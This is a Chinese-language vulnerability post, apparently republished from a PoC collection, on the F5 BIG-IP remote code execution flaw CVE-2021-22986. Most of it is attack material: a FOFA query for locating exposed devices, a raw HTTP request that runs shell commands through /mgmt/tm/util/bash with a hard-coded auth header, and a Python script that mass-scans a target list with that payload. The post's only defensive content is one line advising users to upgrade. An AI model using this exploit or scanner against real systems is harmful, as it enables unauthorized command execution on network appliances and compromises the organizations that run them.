F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986

  • A+
所属分类:安全漏洞

F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986

:漏洞描述🐑


F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

近日,F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行,代码执行的风险声明,F5安全公告更新了BIG-IP,BIG-IQ中的多个严重漏洞。建议广大用户及时将f5 big-iq,f5 big-ip升级到最新版本,避免遭到攻击。


二:  漏洞影响🐇


F5 BIG-IP 16.x: 16.1.0.3

F5 BIG-IP 15.x: 15.1.0.4

F5 BIG-IP 14.x: 14.1.2.6

F5 BIG-IP 13.x: 13.1.3.4

F5 BIG-IP 12.x: 12.1.5.2

F5 BIG-IP 11.x: 11.6.5.2




三:  漏洞复现🐋


FOFA语句: icon_hash="-335242539"

访问登录页面如下

F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986

发送请求包

POST /mgmt/tm/util/bash HTTP/1.1Host: xxx.xxx.xxx.xxx:8443Connection: closeContent-Length: 41Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Upgrade-Insecure-Requests: 1Content-Type: application/json
{"command":"run","utilCmdArgs":"-c id"}

F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986

成功执行命令 id




四:  漏洞POC🦉

import requestsimport sysimport randomimport reimport jsonfrom requests.packages.urllib3.exceptions import InsecureRequestWarning
def title(): print('+------------------------------------------') print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m') print('+ 33[34mGithub : https://github.com/PeiQi0 33[0m') print('+ 33[34m公众号 : PeiQi文库 33[0m') print('+ 33[34mVersion: F5 BIG-IP 33[0m') print('+ 33[36m使用格式: python3 poc.py 33[0m') print('+ 33[36mFile >>> ip.txt 33[0m') print('+------------------------------------------')
def POC_1(target_url): vuln_url = target_url + "/mgmt/tm/util/bash" headers = { "Authorization": "Basic YWRtaW46QVNhc1M=", "X-F5-Auth-Token": "", "Content-Type": "application/json" } data = '{"command":"run","utilCmdArgs":"-c id"}' try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=2) if "commandResult" in response.text and response.status_code == 200: print("33[32m[o] 目标 {}存在漏洞,响应为:{} 33[0m".format(target_url, json.loads(response.text)["commandResult"])) else: print("33[31m[x] 目标 {}不存在漏洞 33[0m".format(target_url)) except Exception as e: print("33[31m[x] 目标 {} 请求失败 33[0m".format(target_url))
def Scan(file_name): with open(file_name, "r", encoding='utf8') as scan_url: for url in scan_url: if url[:4] != "http": url = "https://" + url url = url.strip('n') try: POC_1(url)
except Exception as e: print("33[31m[x] 请求报错 33[0m".format(e)) continue
if __name__ == '__main__': title() file_name = str(input("33[35mPlease input Attack FilenFile >>> 33[0m")) Scan(file_name)

F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986




最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在公众号和交流群,想要加入交流群的公众号点击交流群加我拉你啦

有漏洞想公开投稿的师傅加我,一起完善文库~

别忘了Github下载完给个小星星⭐

https://github.com/PeiQi0/PeiQi-WIKI-POC




本文始发于微信公众号(PeiQi文库):F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: